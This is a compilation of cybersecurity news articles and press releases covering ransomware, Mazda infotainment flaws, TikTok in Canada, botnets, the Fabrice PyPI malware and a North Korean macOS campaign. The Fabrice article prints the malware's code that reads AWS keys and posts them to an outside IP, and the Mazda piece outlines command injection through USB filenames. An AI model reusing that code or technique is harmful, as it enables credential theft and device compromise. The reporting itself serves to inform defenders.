It remains unclear how the attackers gained access to Newpark Resources' system, or what they plan to do with any stolen data the strike may have spewed out.

Source: Don Mammoser via Alamy Stock Photo

Newpark Resources, a Texas-based oil drilling fluids system and composite matting systems provider, announced in a filing with the Securities and Exchange Commission (SEC) that it is dealing with the fallout of a ransomware attack it faced earlier this week.

The company has not shared details as to how the attackers gained access to its network, nor who the threat actors are or why they may have targeted Newpark. But after the breach was discovered, Newpark engaged its security response plan as expected and limited access to certain parts of its systems.

"The incident has caused disruptions and limitation of access to certain of the company's information systems and business applications supporting aspects of the company's operations and corporate functions, including financial and operating reporting systems," Newpark said.

According to Matt Hull, global head for Strategic Threat Intelligence at cybersecurity consultancy NCC Group, any data stolen from the critical infrastructure company has not yet appeared on any leak sites.

And because the company reverted to downtime procedures in response to the attack, it was able to continue manufacturing, and its field operations were uninterrupted. It hopes the attack will not have an effect on its financial conditions, it said.

"Organizations are facing an increasingly pressing challenge: maintaining the security benefits of segmentation while enabling controlled connectivity," stated Chris Grove, director of cybersecurity strategy at Nozomi Networks, in an emailed statement to Dark Reading. "Industrial organizations will need to ensure their defenders can quickly isolate and contain threats, while preventing interruptions to critical operations. This is especially important for sectors where downtime has serious consequences in terms of public safety and economic impact, as would be the case with a critical infrastructure sector."

**About the Author**

Mystery Hackers Target Texas Oilfield Supplier in Ransomware Attack

Hackers can exploit critical vulnerabilities in Mazda’s infotainment system, including one that enables code execution via USB, compromising…

Hackers can exploit critical vulnerabilities in Mazda’s infotainment system, including one that enables code execution via USB, compromising your car’s security and putting you at risk.

Cybersecurity researchers at ZDI (Zero Day Initiative) have identified several critical vulnerabilities in Mazda‘s infotainment systems, specifically in the Connectivity Master Unit (CMU) installed in multiple Mazda car models, including the Mazda 3 from the years 2014 to 2021.

These vulnerabilities, caused by “insufficient sanitization” when handling attacker-supplied input, could allow a physically present attacker to exploit them by connecting a specially crafted USB device to the target system. Successful exploitation could result in arbitrary code execution with root privileges.

****The Target****

The CMU unit, manufactured by Visteon Corporation, an anutomotive technology company, and initially developed by Johnson Controls Inc (JCI), runs on the latest available software version (74.00.324A). However, earlier software versions down to at least 70.x may also be affected by these vulnerabilities. The CMU is part of an active “modding scene” where users release software tweaks to alter the unit’s operation, often exploiting such vulnerabilities.

****The Vulnerabilities****

There are multiple vulnerabilities identified in the CMU system. The details of each are as follows:

*   **SQL Injection (CVE-2024-8355/ZDI-24-1208)**: An attacker can inject malicious SQL code by spoofing the iAP serial number of an Apple device. This allows the attacker to manipulate the database, disclose information, create arbitrary files, and potentially execute code.
*   **OS Command Injection (CVE-2024-8359/ZDI-24-1191)**: The REFLASH\_DDU\_FindFile function in the libjcireflashua.so shared object fails to sanitize user input, allowing an attacker to inject arbitrary OS commands that can be executed by the head unit OS shell.
*   **OS Command Injection (CVE-2024-8360/ZDI-24-1192)**: The REFLASH\_DDU\_ExtractFile function in the libjcireflashua. so shared object also fails to sanitize user input, allowing an attacker to inject arbitrary OS commands that can be executed by the head unit OS shell.
*   **Missing Root of Trust in Hardware (CVE-2024-8357/ZDI-24-1189)**: The application SoC is missing any authentication of the bootstrap code, allowing an attacker to manipulate the root filesystem, configuration data, and potentially the bootstrap code itself.
*   **Unsigned Code (CVE-2024-8356/ZDI-24-1188)**: The VIP MCU can be updated with unsigned code, allowing an attacker to pivot from a compromised application SoC running Linux to the VIP MCU and gain direct access to the connected CAN busses of the vehicle.

****Exploitation****

An attacker can exploit these vulnerabilities by creating a file on a FAT32-formatted USB mass storage device with a name that contains the OS commands to be executed. The filename must end with .up for it to be recognized by the software update handling code.

Once the initial compromise is achieved, the attacker can gain persistence through manipulation of the root file system or install a specially crafted VIP microcontroller software allowing unrestricted access to vehicle networks.

****Associated Risks****

According to ZDI’s blog post, the attack chain can be completed in a few minutes in a lab environment, and there is no reason to believe it will take significantly more time against a unit installed in a car.

This means that the vehicle can be compromised while being handled by a valet, during a rideshare, or via USB malware. The CMU can then be compromised and “enhanced” to attempt to compromise any connected device in targeted attacks that can result in DoS, bricking, ransomware, safety compromise, etc. The worst part of it is that these security vulnerabilities remain unpatched.

> _“This research effort and its output highlighted the fact that high-impact vulnerabilities can be found even in a very mature automotive product that has been on the market for a number of years and with a long history of security fixes. To date, these vulnerabilities remain unpatched by the vendor.”_
> 
> ZDI analyst Dmitry Janushkevich 

****Conclusion****

The discovery of these vulnerabilities shows the importance of considering the whole system’s security and security-testing complete production systems in all their operational modes. The use of memory-safe languages or other security tools does not guarantee that deployed systems are secure. It is important to ensure system integrity at all runtime stages and for all components to guarantee downstream security properties of languages and their compilers.

1.  Cybercriminals Exploit CAN Injection Hack to Steal Cars
2.  App Flaw Let Honda and Nissan Cars Hack by Knowing VIN
3.  Tesla cars can be remotely hacked using drone, WIFI dongle
4.  Hackers Remotely Control Kia Cars by Exploiting License Plates
5.  High severity Intel chip flaw left cars and IoT devices vulnerable

Hackers Can Access Mazda Vehicle Controls Via System Vulnerabilities

Canada wants TikTok to dissolve its business in the country. TikTok plans to challenge the decision in court

The Government of Canada ordered the TikTok Technology Canada Inc. to close its offices in the country following a national security review.

This decision was made in accordance with the Investment Canada Act, which allows for the review of foreign investments that may be injurious to Canada’s national security. Canada’s Minister of Innovation, Science and Industry stated:

“As a result of a multi-step national security review process, which involves rigorous scrutiny by Canada’s national security and intelligence community, the Government of Canada has ordered the wind up of the Canadian business carried on by TikTok Technology Canada, Inc. The government is taking action to address the specific national security risks related to ByteDance Ltd.’s operations in Canada through the establishment of TikTok Technology Canada, Inc. The decision was based on the information and evidence collected over the course of the review and on the advice of Canada’s security and intelligence community and other government partners.”

This does not mean Canadians will no longer have access to the popular social media platform. It just means the Chinese owned company will have to close its Canadian operations located in Toronto and Vancouver.

Canada says the decision whether citizens want to use the social media platform is a personal choice but it does encourage Canadians to consult the guidance issued by Communications Security Establishment Canada’s Canadian Centre for Cyber Security to help them assess these risks.

One of the key points of their guidance is the “security over convenience” guideline, which says:

“It may be convenient to have an app always know your location or be able to fetch your photos without approval, but this isn’t the most secure option. Be aware of the features and elements of your device that can be accessed by an app, and make sure you limit permissions.”

Another one that is important in this case is the “consider where your data is being stored” guideline which reminds people to think about which nation’s laws will apply to your information and your activity on the platform.

TikTok responded that:

> “Shutting down TikTok’s Canadian offices and destroying hundreds of well-paying local jobs is not in anyone’s best interest, and today’s shutdown order will do just that. We will challenge this order in court.”

TikTok’s Chinese ownership has brought problems in other countries, as well. In April 2024, Malwarebytes Labs reported on how the US Senate approved a bill that would effectively ban TikTok from the country unless Chinese owner ByteDance gives up its share of the immensely popular app. That law is currently being challenged in court by the popular social media platform.

**We don’t just report on threats – we help protect your social media**

Cybersecurity risks should never spread beyond a headline. Protect your social media accounts by using Malwarebytes Identity Theft Protection.

 TikTok ordered to close Canada offices following &#8220;national security review&#8221; 

The threat actors behind the AndroxGh0st malware are now exploiting a broader set of security flaws impacting various internet-facing applications, while also deploying the Mozi botnet malware.
"This botnet utilizes remote code execution and credential-stealing methods to maintain persistent access, leveraging unpatched vulnerabilities to infiltrate critical infrastructures," CloudSEK said in a

IoT Security / Vulnerability

The threat actors behind the AndroxGh0st malware are now exploiting a broader set of security flaws impacting various internet-facing applications, while also deploying the Mozi botnet malware.

"This botnet utilizes remote code execution and credential-stealing methods to maintain persistent access, leveraging unpatched vulnerabilities to infiltrate critical infrastructures," CloudSEK said in a new report.

AndroxGh0st is the name given to a Python-based cloud attack tool that's known for its targeting of Laravel applications with the goal of sensitive data pertaining to services like Amazon Web Services (AWS), SendGrid, and Twilio.

Active since at least 2022, it has previously leveraged flaws in the Apache web server (CVE-2021-41773), Laravel Framework (CVE-2018-15133), and PHPUnit (CVE-2017-9841) to gain initial access, escalate privileges, and establish persistent control over compromised systems.

Earlier this March, U.S. cybersecurity and intelligence agencies revealed that attackers are deploying the AndroxGh0st malware to create a botnet for "victim identification and exploitation in target networks."

The latest analysis from CloudSEK reveals a strategic expansion of the targeting focus, with the malware now exploiting an array of vulnerabilities for initial access -

*   CVE-2014-2120 (CVSS score: 4.3) - Cisco ASA WebVPN login page XSS vulnerability
*   CVE-2018-10561 (CVSS score: 9.8) - Dasan GPON authentication bypass vulnerability
*   CVE-2018-10562 (CVSS score: 9.8) - Dasan GPON command injection vulnerability
*   CVE-2021-26086 (CVSS score: 5.3) - Atlassian Jira path traversal vulnerability
*   CVE-2021-41277 (CVSS score: 7.5) - Metabase GeoJSON map local file inclusion vulnerability
*   CVE-2022-1040 (CVSS score: 9.8) - Sophos Firewall authentication bypass vulnerability
*   CVE-2022-21587 (CVSS score: 9.8) - Oracle E-Business Suite (EBS) Unauthenticated arbitrary file upload vulnerability
*   CVE-2023-1389 (CVSS score: 8.8) - TP-Link Archer AX21 firmware command injection vulnerability
*   CVE-2024-4577 (CVSS score: 9.8) - PHP CGI argument injection vulnerability
*   CVE-2024-36401 (CVSS score: 9.8) - GeoServer remote code execution vulnerability

"The botnet cycles through common administrative usernames and uses a consistent password pattern," the company said. "The target URL redirects to /wp-admin/, which is the backend administration dashboard for WordPress sites. If the authentication is successful, it gains access to critical website controls and settings."

The attacks have also been observed leveraging unauthenticated command execution flaws in Netgear DGN devices and Dasan GPON home routers to drop a payload named "Mozi.m" from different external servers ("200.124.241\[.\]140" and "117.215.206\[.\]216").

Mozi is another well-known botnet that has a track record of striking IoT devices to co-opt them into a malicious network for conducting distributed denial-of-service (DDoS) attacks.

While the malware authors were arrested by Chinese law enforcement officials in September 2021, a precipitous decline in Mozi activity wasn't observed until August 2023, when unidentified parties issued a kill switch command to terminate the malware. It's suspected that either the botnet creators or Chinese authorities distributed an update to dismantle it.

AndroxGh0st's integration of Mozi has raised the possibility of a possible operational alliance, thereby allowing it to propagate to more devices than ever before.

"AndroxGh0st is not just collaborating with Mozi but embedding Mozi's specific functionalities (e.g., IoT infection and propagation mechanisms) into its standard set of operations," CloudSEK said.

"This would mean that AndroxGh0st has expanded to leverage Mozi's propagation power to infect more IoT devices, using Mozi's payloads to accomplish goals that otherwise would require separate infection routines."

"If both botnets are using the same command infrastructure, it points to a high level of operational integration, possibly implying that both AndroxGh0st and Mozi are under the control of the same cybercriminal group. This shared infrastructure would streamline control over a broader range of devices, enhancing both the effectiveness and efficiency of their combined botnet operations."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

AndroxGh0st Malware Integrates Mozi Botnet to Target IoT and Cloud Services

PRESS RELEASE

Clearwater, Fla. – October 29, 2024 – According to a new AI Opportunity Report from remote connectivity and workplace digitalization solution company TeamViewer, 80% of U.S. business leaders say their organization’s AI adoption is mature, and 65% are sick of the hype and demand practical implementations of AI for their businesses. Leading from the C-suite, 81% of U.S. key decision makers currently use AI at least weekly, up from 60% last year, a notable 35% increase year-over-year. 

Most U.S. business leaders (72%) also agree that AI is vital to improving their organization’s financial outcomes. Along these lines, two-thirds (66%) agree that AI will positively affect revenue over the next year, with respondents saying that the technology makes an average of 249% revenue growth possible. Nearly a quarter of U.S. respondents (23%) believe that not implementing AI technology risks falling behind competitors and 24% foresee increased costs due to a lack of automation.

Successfully integrating AI into remote connectivity support is a prime example of how efficiencies can lead to better financial outcomes. Enter TeamViewer’s new AI-powered Session Insights.

AI-Powered Session Insights 

Aimed at helping IT teams boost efficiency and streamline operations, Session Insights is now being added to TeamViewer’s Tensor remote connectivity solution to automate session documentation and provide analytics, enabling faster handovers and smarter decision-making. By optimizing resources and capturing valuable knowledge, the new capabilities empower IT support teams to resolve issues faster, improve customer satisfaction, and scale expertise, even with limited staff.  

The new features will help internal IT teams better manage employee help desk requests and will also aid customer support teams providing remote assistance to keep their products onsite and customers up and running and aligned with uptime agreements. 

“AI adoption is growing rapidly as businesses increasingly recognize its tangible benefits in driving productivity and streamlining operations. Our research reveals that 81% of decision-makers now engage with AI at least weekly, a substantial rise from last year’s 60%. With the launch of TeamViewer’s new AI-powered Session Insights, we're enabling organizations to make smarter decisions and optimize processes while adhering to the highest security and data privacy standards. We uphold stringent encryption practices to safeguard customer data, ensuring secure processing, while also providing admins the control to enforce company-wide policies and keeping users informed every step of the way,” said Mei Dent, Chief Product and Technology Officer, TeamViewer. 

Trust, Security, Career Advancement & Equality

The report also delves into a variety of other topics gauging business leaders’ current perceptions of AI, including: 

*   Trust in AI: 50% of U.S. business leaders trust AI to act on business forecasts and make business decisions with an impressive 42% trusting AI to make decisions without human oversight.
    
*   Security: 75% of U.S. business leaders are concerned about data management in the use of AI and 67% would consider banning the use of AI outside of the IT team.
    
*   Career Advancement: 75% of U.S. business leaders believe AI is a key skill to enhance their career and 73% say AI has given them the chance to learn new skills they otherwise would not have.
    
*   The Great Equalizer: 72% of U.S. business leaders believe AI can help create equal job opportunities for parents and caregivers while 79% think AI can help increase accessibility in the workplace.
    

With 73% of U.S. respondents believing AI will drive the biggest productivity boom in a century and business leaders reporting that AI saves U.S. IT professionals approximately 16 hours per month, there is clearly huge momentum for increasing AI use in business, including TeamViewer’s AI-powered Session Insights, which integrates with Microsoft Teams and ServiceNow. More information can be found here.  

Survey Methodology 

In The AI Opportunity Report, TeamViewer uncovers the attitudes of 1,400 (500 in the U.S.) information technology, business, and operational technology decision makers towards Artificial Intelligence, across the UK, France, Germany, Australia, Singapore, and the U.S. The research was conducted online by Sapio Research in August and September 2024. 

About TeamViewer

TeamViewer is a leading global technology company that provides a connectivity platform to remotely access, control, manage, monitor, and repair devices of any kind – from laptops and mobile phones to industrial machines and robots. Although TeamViewer is free of charge for private use, it has more than 640,000 subscribers and enables companies of all sizes and from all industries to digitalize their business-critical processes through seamless connectivity. Against the backdrop of global megatrends like device proliferation, automation and new work, TeamViewer proactively shapes digital transformation and continuously innovates in the fields of Augmented Reality, Internet of Things and Artificial Intelligence. Since the company’s foundation in 2005, TeamViewer’s software has been installed on more than 2.5 billion devices around the world. The company is headquartered in Göppingen, Germany, and employs more than 1,500 people globally. In 2023, TeamViewer achieved a revenue of around EUR 627 million. TeamViewer SE (TMV) is listed at Frankfurt Stock Exchange and belongs to the MDAX. Further information can be found at www.teamviewer.com.

Business Leaders Shift to Tangible AI Results, Finds New TeamViewer Study

PRESS RELEASE

TORONTO, Oct. 30, 2024 /PRNewswire/ -- In 2024, Canadian banks have seen just 34% of the reported fraud cases they experienced a year ago. And yet, Canadian retail banking customers appear on pace to lose as much as or more than the $569 million they lost to fraud in 2023 (triple what they lost in 2021). BioCatch – the global leader in digital fraud detection and financial crime prevention powered by behavioral biometric intelligence – says these findings suggest fraudsters have altered their strategies, honing attacks to target fewer Canadians for more money per scam.

"While fraud volumes have decreased significantly over the last year, we're observing an increase in the average value of these cases," BioCatch Director of Global Fraud Intelligence Tom Peacock said. "We can attribute much of this to the rise in social engineering scams in Canada, particularly impersonation scams, which are notoriously higher value than other fraud types. More than 70% of impersonation scam losses in Canada originate from five-figure cases, greatly boosting the country's scam-loss average."

BioCatch's 2024 Digital Banking Fraud Trends in Canada report, also highlights that most Canadian fraud victims are now ages 20-49 instead of 50-89, debunking the common misconception that older people provide easier and more lucrative targets.

"Artificial Intelligence is super-charging fraud," BioCatch Global Advisory Director Seth Ruden said, "compounding its impact, and allowing bad actors to scale and sophisticate their scams with deepfakes and other devices. As the industry deploys the newest authentication methods in both account opening and account takeover processes, fraudsters will undoubtedly attack these as well."

BioCatch also found one in seven scam sessions in Canada showed signs of remote access trojans (RAT), whether active RAT (where the fraudster tricks the victim into granting them control of the session so they can execute the fraud themselves) or passive RAT (where the fraudster guides the victim through payment process).

Click here to access BioCatch's complete 2024 Digital Banking Fraud Trends in Canada report.

BioCatch fraud prevention experts Tom Peacock and Seth Ruden will hold a live conversation about the growth of social engineering scams in Canada and the other latest fraud trends in the country on Nov. 14. To register for that exclusive session, click here.

About BioCatch:

BioCatch stands at the forefront of digital fraud detection, pioneering behavioral biometric intelligence grounded in advanced cognitive science and machine learning. BioCatch analyzes thousands of user interactions to support a digital banking environment where identity, trust, and ease coexist. Today, 32 of the world's largest 100 banks and 210 total financial institutions rely on BioCatch Connect™ to combat fraud, facilitate digital transformation, and grow customer relationships. BioCatch's Client Innovation Board – an industry-led initiative featuring American Express, Barclays, Citi Ventures, HSBC, and National Australia Bank – collaborates to pioneer creative and innovative ways to leverage customer relationships for fraud prevention. With more than a decade of data analysis, 92 registered patents, and unmatched expertise, BioCatch continues to lead innovation to address future challenges. For more information, please visit www.biocatch.com.

Canadians Expected to Lose More Than $569M to Scams in 2024

Questions remain over what a corporate ban will achieve, since Canadians will still be able to use the app.

Source: SOPA Images Limited via Alamy Stock Photo

ByteDance is being exiled from Canada, though the TikTok app is not.

Following the US's example, Canada has spent recent years rubbing up against the world's most popular Chinese app. In February 2023, TikTok was banned from all government devices, citing security concerns. Later that year, the government called for a broader national security review under the 1985 Investment Canada Act, which empowers the government to scrutinize foreign investments.

In concluding that review, the minister of Innovation, Science and Economic Development Canada (ISED) — a federal agency responsible for regulating and supporting various aspects of the country's economy, industry, and scientific endeavors — unveiled a significant, though not comprehensive, development in his country's approach.

To address "specific national security risks," the minister said yesterday, the offices of TikTok Technology Canada Inc. — the Canadian subsidiary of ByteDance, TikTok's parent company — must now be shuttered. However, he noted, the government will not actually block any Canadians from using the app, as "the decision to use a social media application or platform is a personal choice."

**TikTok vs. Governments**

Ever since TikTok blew up during the COVID-19 pandemic, governments worldwide have struggled with how to administer: Ban it, to the chagrin of millions, or don't, and risk consequences to mass privacy and national security.

Concern is widespread that the Chinese Communist Party (CCP) could conduct data gathering and spying through TikTok, since it wields potentially unlimited authority over Chinese companies. And "The CCP has long been known for having an enormous capability to gather otherwise benign-looking datasets, and to process them to produce intelligence to further its national interests," notes Casey Ellis, founder and adviser at Bugcrowd. "While it can easily be argued that Western governments and companies are capable of the same, the CCP's national interests are at best competitive, and at worst disruptive to the national interests of the West."

Blocking the app to prevent CCP data gathering is controversial, however, since it's massively popular, and there is no definitive, significant proof of such malicious activity to date. A few scattered countries have done so (for varying reasons), most notably India in 2020, but most have taken up solutions somewhere in the middle.

In 2020, President Trump signed executive orders effectively forcing ByteDance to sell TikTok to an American company, or else face a national ban. President Biden's No TikTok on Government Devices Act banned the app in government settings, and his Protecting Americans from Foreign Adversary Controlled Applications Act carried the forced sale idea from the Trump administration. US policy is likely to subside now that Trump has been elected again. "Trump has made strong moves against ByteDance in the past," Ellis notes. "He has a reputation for being tough on China, and for operating on the assumption that China is competitive to the US as a great power. I think we'll see more activity around addressing 'creeping threats' from ByteDance and other Chinese companies, particularly those with a larger and established presence, both in the US and amongst its allies, over the coming year."

Meanwhile, in 2023, the Canadian government took parallel actions. And just as it had in the US, TikTok says it will challenge Canada's latest ruling in court.

**What Would Actually Solve TikTok Privacy?**

Debate has now begun over whether banning the corporate half of the TikTok operation will be helpful, if not abjectly harmful to Canada's national security aims.

As Canadian academic Michael Geist argued in a blog post, "banning the company rather than the app may actually make matters worse since the risks associated with the app will remain but the ability to hold the company accountable will be weakened," since it will no longer have a domestic presence. "It is hard to envision it prioritizing (or perhaps even complying) with Canadian regulatory processes if it is banned from formally operating in the jurisdiction."

Dark Reading has asked the ISED for its view of how the ban will benefit Canadian national security. This article will be updated when ISED's response is received.

A separate development poised to directly affect TikTok data collection in Canada is the legislation C-27, which would supersede the Personal Information Protection and Electronic Documents Act, Canada's primary privacy legislation since 2000.

C-27 packages three separate Acts: the Consumer Privacy Protection Act, the bit most relevant for TikTok user privacy; the Electronic Documents Act; and the Artificial Intelligence and Data Act. Though it may be viewed as efficient and ambitious to address so many issues at once, ongoing debates primarily around the artificial intelligence component are currently holding up the passage of the other two along with it.

**About the Author**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

Canada Closes TikTok Offices, Citing National Security

The malicious Python package “Fabrice” on PyPI mimics the “Fabric” library to steal AWS credentials, affecting thousands. Learn how…

The malicious Python package _“Fabrice”_ on PyPI mimics the _“Fabric”_ library to steal AWS credentials, affecting thousands. Learn how it works and protect your projects with smart security practices.

Cybersecurity researchers at Socket Security have identified a malicious Python package named “Fabrice” on the Python Package Index (PyPI), which has been actively harvesting Amazon Web Services (**AWS**) credentials from unsuspecting developers for the past three years.

This package, which mimics the legitimate and widely-used “fabric” library for SSH command execution has over 202 million downloads, the malicious version has been downloaded over 37,000 times since it surfaced in 2021.

****Typosquatting****

The malicious Fabrice package is designed to exploit the trust associated with the genuine “fabric” library. This technique is called **typosquatting** in which scammers take advantage of situations in which users mistype the name of the popular “fabric” package.

The malware includes payloads that steal credentials, install backdoors, and execute additional platform-specific scripts. The scammers behind the package are particularly interested in Amazon Web Services (AWS) credentials. Currently, the attackers are targeting users and developers on Windows and Linux devices.

****Targeting Linux and Windows Devices****

On Linux, the malware creates hidden directories within the user’s home directory to store and run scripts downloaded from a remote server. These scripts are designed to hide their activity, making detection quite difficult.

On Windows, it uses VBScript to run hidden Python scripts, which in turn download malicious executables. These executables are then scheduled to run repeatedly, assuring persistence on the infected system. The malware also attempts to delete its initial entry point to cover its tracks.

****Stolen Credentials Sent to Paris****

In its **report** shared with Hackread.com ahead of publishing, both methods lead to the extraction of AWS credentials, sending them to a server located in Paris, operated by M247, a VPN service provider. This could allow attackers to abuse these credentials for unauthorized access to cloud resources. What’s worse, the campaign remains active despite researchers’ alerts to PyPI.

****Example of AWS Credential Exfiltration****

session = boto3.Session()  
cd = session.get_credentials()  
ak = cd.access_key  
sk = cd.secret_key  
data = {"k": ak, "s": sk}  
muri = "ht"+"tp"+":"+"//89.44.9.227/akkfuifkeifsa"  
requests.post(muri, json=data, timeout=4

> _“Recognizing the severe risk fabrice poses, our team has proactively reported it to the PyPI team for takedown to safeguard the broader developer community. It is still live at the time of publishing.”_
> 
> Socket Security

Rom Carmel, Co-Founder and CEO of Identity Security platform **Apono** weighed in on the latest development stating, _“_Malicious actors continue to find success by putting malicious software packages out into the developer community, playing a numbers game that a percentage of developers will make the very human mistake of choosing the wrong package for their code._“_

_“_While methods like improving security awareness education and implementing processes for secure coding can go a long way in helping developers to make more secure decisions as we see with phishing, security teams need to take steps to secure their organizations from an assumed breach approach,_“_ Rom warned.

_“_To protect your organization once credentials are compromised as we see on a near daily basis, we need to think in terms of defence in depth. That means implementing not only MFA but also reducing the blast radius from an account takeover in terms of the availability of access and the scope of privileges that attackers can use,_“_ he advised.

****Additional Security Measures for Developers****

Developers are the backbone of any project. The information that can be extracted from them can become a treasure trove if it falls into the wrong hands. Lately, **Python developers, in particular**, have been heavily targeted by threat actors. Here are some tips to protect your data and accounts from hackers and malware attacks:

*   **Stay Informed**: Keep yourself up-to-date about security advisories from platforms like PyPI. Community reports and security research blogs can be valuable in staying protected against threats like Fabrice.
*   **Double-check for typosquatting:** Always double-check the names of packages before installation. Look for signs of typosquatting like slight misspellings or unusual publisher names.
*   **Use Security Tools**: Employ tools like Socket for GitHub, which provides real-time monitoring and security checks for dependencies in your projects. Such tools can automatically detect and alert suspicious activities or known malicious packages.
*   **Regular Security Audits**: Regularly review and audit the software dependencies of your projects. Make sure that all packages are from trusted sources and serve a legitimate purpose.
*   **Follow Hackread.com:** Most importantly, follow Hackread.com.

1.  **Why is learning Python important in Data Science?**
2.  **6 official Python repositories plagued with cryptomining malware**
3.  **PythonAnywhere Cloud Platform Abused for Hosting Ransomware**
4.  **NTLM Credential Theft in Python Apps Threaten Windows Security**
5.  **Python in Threat Intelligence: Analyzing – Mitigating Cyber Threats**

Fabrice Malware on PyPI Has Been Stealing AWS Credentials for 3 Years

We have great news to share: Malwarebytes has acquired AzireVPN, a privacy-focused VPN provider.

Today I have great news to share: We’ve acquired AzireVPN, a privacy-focused VPN provider based in Sweden. 

I wanted to share with you our intentions behind this exciting step, and what this means for our existing users and the family of solutions they rely on to keep them private and secure. 

Malwarebytes has long been an advocate for user privacy (think Malwarebytes Privacy VPN and our free web extension Malwarebytes Browser Guard). Now, we’re leaning even more on our mission to reimagine consumer cybersecurity to protect devices and data, no matter where users are located, how they work and play, or the size of their wallet.  

With AzireVPN’s infrastructure and intellectual property, Malwarebytes is poised to develop more advanced VPN technologies and features, offering increased flexibility and enhanced security for our users. 

**Why AzireVPN?** 

AzireVPN is renowned for its robust security standards and privacy-first commitment. Here are two examples of what the company does to support that: 

*   AzireVPN physically owns and controls all of its dedicated and diskless servers—a practice Malwarebytes is committed to continuing.  

*   The company developed Blind Operator, a unique privacy feature implemented to completely disable both remote and local access to its servers. This creates a barrier against unauthorized modifications and traffic interception, making it virtually impossible for anyone to modify or tap the traffic on its servers and share any information about a user.  

**What does this mean for existing Malwarebytes Privacy VPN customers?** 

There are no changes for Malwarebytes Privacy VPN customers at this time. They will continue to enjoy our streamlined, integrated user experience, and our no-log service will never track, store, or share any user network data.  

**What does this mean for existing AzireVPN customers?** 

AzireVPN customers will also continue to enjoy the same privacy-focused VPN service – no logs, no data collection, no bandwidth limitations. There will continue to be no requirement to share any information to sign up for the service.   

**An exciting future is ahead of us** 

We’ll share more details on our future VPN offering in the coming months.  

I’m so excited about our future. This is yet another milestone for Malwarebytes, underscoring our commitment to privacy and a free and open internet.  

Thanks for putting your trust in us to protect you.

 Malwarebytes acquires AzireVPN to fuel additional VPN features and functionalities  

North Korean hackers are targeting cryptocurrency businesses with a sophisticated new malware campaign, dubbed “Hidden Risk.” Learn how…

North Korean hackers are targeting cryptocurrency businesses with a sophisticated new malware campaign, dubbed “Hidden Risk.” Learn how this stealthy attack works, the techniques used, and how to protect yourself from this growing threat.

North Korean state-sponsored APT group ‘**BlueNoroff**‘ is targeting crypto-related businesses in a campaign dubbed ‘Hidden Risk’, according to SentinelOne’s findings shared with Hackread.com. 

SentinelLabs’ threat researchers reportedly discovered that BlueNoroff, a subgroup of the larger North Korean state-backed **Lazarus Group**, is targeting cryptocurrency and DeFi businesses using use email and PDF-based lures with fake news headlines/crypto-related stories in a campaign that began in July 2024.

Examples of fake news, posts and announcements used in the attack (Via SentinelOne)

****Analyzing the Attack****

Researchers noted that attackers have employed unique tactics to evade detection and compromise victim systems. The attack begins with a **well-crafted phishing email** that lures unsuspecting victims into clicking on a malicious link that leads to a seemingly legitimate PDF document, which is actually hiding a malicious Swift-language-based Mac application cleverly disguised as a PDF reader (signed/notarized on 19 October 2024).

“The application is disguised as a link to a PDF document relating to a cryptocurrency topic such as “Hidden Risk Behind New Surge of Bitcoin Price”, “Altcoin Season 2.0-The Hidden Gems to Watch” and “New Era for Stablecoins and DeFi, CeFi”,” researchers **explained**.

Once executed, this application discreetly downloads a decoy PDF (Hidden Risk) and then downloads/executes a malicious x86-64 binary (“growth”) on both Intel and Apple silicon machines. 

Growth installs itself persistently and acts as a backdoor. It gathers sensitive information about the infected system, communicates with a remote server controlled by the attackers, and can potentially receive and execute commands.

****Persistence Mechanism****

To ensure persistence, the attackers have opted for a unique method of modifying the Zsh configuration file (zshenv) by adding malicious code to ensure its continued presence. This is a critical file used by the Zsh shell and is sourced during every Zsh session, allowing the backdoor to automatically execute upon system startup, even after a reboot.

****The BlueNoroff Connection****

SentinelLabs’ researchers have linked this campaign with BlueNoroff because it resembles techniques from their past campaigns, including parsing server commands and saving them in hidden files. The campaign’s network infrastructure analysis also reveals connections to domains used in previous campaigns using services like **NameCheap** and Quickpacket for hosting.

Furthermore, the malware uses a User-Agent string previously linked to BlueNoroff’s “**RustBucket**” malware and exploits a developer account to get their malware notarized by Apple, bypassing security measures like **Gatekeeper**.

****Staying Protected****

BlueNoroff has a history of targeting cryptocurrency exchanges, venture capital firms, and banks and poses a constant threat to the industry. They prefer using PDF-based lures mainly because PDF documents are widely used and trusted, making them ideal for malicious payloads.

Hackread recently **reported** BlueNoroff-linked malware, TodoSwift, disguised as a legitimate PDF viewer and ObjCShellz malware **targeting macOS** to run remote shell commands on Intel and Arm Macs.

Therefore, it is important to double-check email addresses, watch out for emails from anonymous sources, and avoid clicking on links in unknown emails, especially if they ask for downloading applications/PDFs. MacOS users must remain aware of risks given the sudden rise in **macOS-oriented attacks**.

1.  **Fake North Korean IT Workers Infiltrate Western Firms**
2.  **North Korean Hackers Team Up with Play Ransomware**
3.  **N Korean hackers stole $1.7 billion from crypto exchanges**
4.  **North Korean Hackers Drop Linux Malware for ATM Cashouts**
5.  **SnatchCrypto attack hits DeFi, Blockchain Firms with backdoor**

Tag

#intel